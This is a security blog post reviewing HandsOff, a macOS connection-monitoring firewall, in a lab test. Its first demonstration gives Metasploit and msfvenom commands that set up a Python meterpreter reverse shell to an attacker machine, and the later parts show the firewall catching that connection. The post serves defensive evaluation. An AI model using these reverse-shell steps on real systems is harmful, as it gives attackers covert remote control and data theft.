HandsOff an Ultimate Firewall for your Mac | Lucideus Research

Introduction
Hands Off is a free/paid third party macOS application developed by One Periodic Inc. It’s an application which solely monitors a mac for malicious activity or policy violations. Any detected activity or policy violation is typically reported to an administration. It actually alarms when it finds any new inbound or outbound connections in an entire network backbone.  

What Firewall Actually Does
Firewall is an application, which monitors and control the access of applicants to your network and disks. Being able to monitor the normally unnoticeable activities enables you to make informed decisions regarding the transfer of your private information, hence avoiding confidential information leakage. [~Reference: https://www.oneperiodic.com/products/handsoff ]

Lab Environment
  • Test Machine: macOS High Sierra ver. 10.13.2
  • Attacker Machine: Kali Linux 2017.3
  • Application: Hands Off

POC I

Default firewall of mac is in active state but it cannot prevent our mac from getting compromised. Suppose, someone deployed hidden backdoor in our mac or some malicious code is trying to establish connection in between our mac and remote server. And there is no way through which we could get notified of such connections

Step 1: Setup metasploit
  1. #msfconsole
  2. #use exploit/multi/handler
  3. #set PAYLOAD python/meterpreter/reverse_tcp
  4. #set LHOST <Attacker’s IP> 
  5. in my case its 172.16.14.129
  6. #set LPORT <Any Random Port>
  7. in my case its 443
  8. #exploit → this will start a listener 
../Documents/Screen%20Shots/Screen%20Shot%202018-01-24%20at%202.02.31%20AM.jpg

Step 2: Generate Shellcode 
msfvenom –p python/meterpreter/reverse_tcp LHOST <Attacker’s IP> LPORT <port assigned earlier> > /root/Desktop/macshell443.py

Step 3: Deploy generated exploit to mac test machine
Step 4: Execute shellcode Open Terminal in mac and type in $ python (path of your shellcode) i.e. $ python /Users/mohitsingh/Desktop/macshell443.py ../Documents/Screen%20Shots/Screen%20Shot%202018-01-24%20at%202.13.10%20AM.jpg
Step 4: You will receive a meterpreter session.
../Documents/Screen%20Shots/Screen%20Shot%202018-01-24%20at%202.14.10%20AM.jpg


POC II

In this scenario a third party application HandsOff  is been deployed which will monitor each and every connection which is trying to get established in between mac test machine and attacker machine. It will not get connected until and unless we allow that specific connection our set permissions for that connection in HandsOff application.

Step 1: Download and install HandsOff from its official website.

Step 2: Open Hands Off

../Documents/Screen%20Shots/Screen%20Shot%202018-01-24%20at%201.51.24%20AM.jpg
Step 3: Enable Rules. Instantaneously it will start monitoring each and every connection.
../Documents/Screen%20Shots/Screen%20Shot%202018-01-24%20at%201.51.24%20AM%20copy.jpg
Step 4: Setup Metasploit, and create a listener. Step 5: Execute commands again using terminal in mac
Step 6: When you will execute shell command using terminal Hands Off will ask for permissions simply click on Continue

../Documents/Screen%20Shots/Screen%20Shot%202018-01-24%20at%202.26.19%20AM.jpg

Step 7: When the command is executed in terminal, Hands Off comes in action it will popup asking either to allow or deny terminal via python and showing. 

Hands Off will give you in depth detail of connection:
  • Application used through which connection is being established.
  • Process ID of the application which is being used.
  • Information about the service which is helping malicious code to establish connection.
  • Process ID of the service provider.
  • IP Address and port number of the connection
../Documents/Screen%20Shots/Screen%20Shot%202018-01-24%20at%202.26.45%20AM.jpg
Note- Connection will not be established until an administrator Allows for it, else the connection will remain in suspended state.

Step 8: Click on Allow button and you will receive a meterpreter session in kali

../Documents/Screen%20Shots/Screen%20Shot%202018-01-24%20at%202.28.36%20AM%20copy.jpg

Benfits of Enabeling Monitor Mode You should also enable Monitor mode in HandsOff so that even if any malicious code anyhow succeed to establish a connection, and execute any command for eg if Attackers only checks for list of file/folder in working directory using ‘ls’ command you will notice a popup and in it you will find that whichever application or tool was transmitting the data and through which service of that tool it is trying to do so following with the IP address it was sending it to in highlighted in green colour. How to enable Monitor Mode Step 1: Open Hands Off Step 2: Click on Preferences
../Documents/Screen%20Shots/Screen%20Shot%202018-01-24%20at%203.01.50%20AM.jpg
Step 3: Click on Monitor tab and check “Enable Network Monitor”
../Documents/Screen%20Shots/Screen%20Shot%202018-01-24%20at%203.06.07%20AM%20copy.jpg

This is how our Hands Off monitor mode terminal looks like
../Documents/Screen%20Shots/Screen%20Shot%202018-01-24%20at%203.29.29%20AM.jpg


POC III

Our connections between the Attacker machine and mac test machine is been established. We have our meterpreter session in Attacker machine’s terminal.

Through meterpreter session one could access throughout the target machine and the fun part is victim would not even come to know that someone is accessing through his or her machine remotely.

But now we have our monitor mode enabled in victim machine which is monitoring each and every connections, and through which application connection is being established meanwhile we will also come to know which service of that application is facilitating this mischievous activity and leaking our data to attackers.

../Documents/Screen%20Shots/Screen%20Shot%202018-01-24%20at%203.10.04%20AM%20copy.jpg

Here, in this snap on the right hand side terminal window we can clearly see that we have a meterpreter session in our attacking machine. We can notice our IP within the right side red square. Meanwhile on the left hand side we see our monitor mode terminal with the same ip within the red square which we had in the right side square box of Attackers window. This tells us that there is some kind of connection which has been established. Till now we haven’t used our meterpreter session. But, soon as we tried to access targets machine using meterpreter session monitor mode terminal poped/showed up and exposed whole activity ../Documents/Screen%20Shots/Screen%20Shot%202018-01-24%20at%203.10.24%20AM%20copy.jpg

../Documents/Screen%20Shots/Screen%20Shot%202018-01-24%20at%203.10.30%20AM%20copy.jpg

So now we know from above two images that as soon as someone tries to get into our mac he will be exposed and we can kill the processes, block IP and the port to completely get our back saved. Conclusion It’s high time now, you never know when and how your mac can be compromised. It’s seems that macOS developers are really good in social engineering because they somehow manage to convince you that macOS is one of the most secured operating system. But as a matter of fact there are numerous of exploits present which can hack your mac machine in just a matter of minutes, only by pressing few keystrokes. It is better to deploy a high level firewall in your macOS which will help you to save your important data from being compromised and in the same time it evens saves you from getting bullied online.



Post a Comment

0 Comments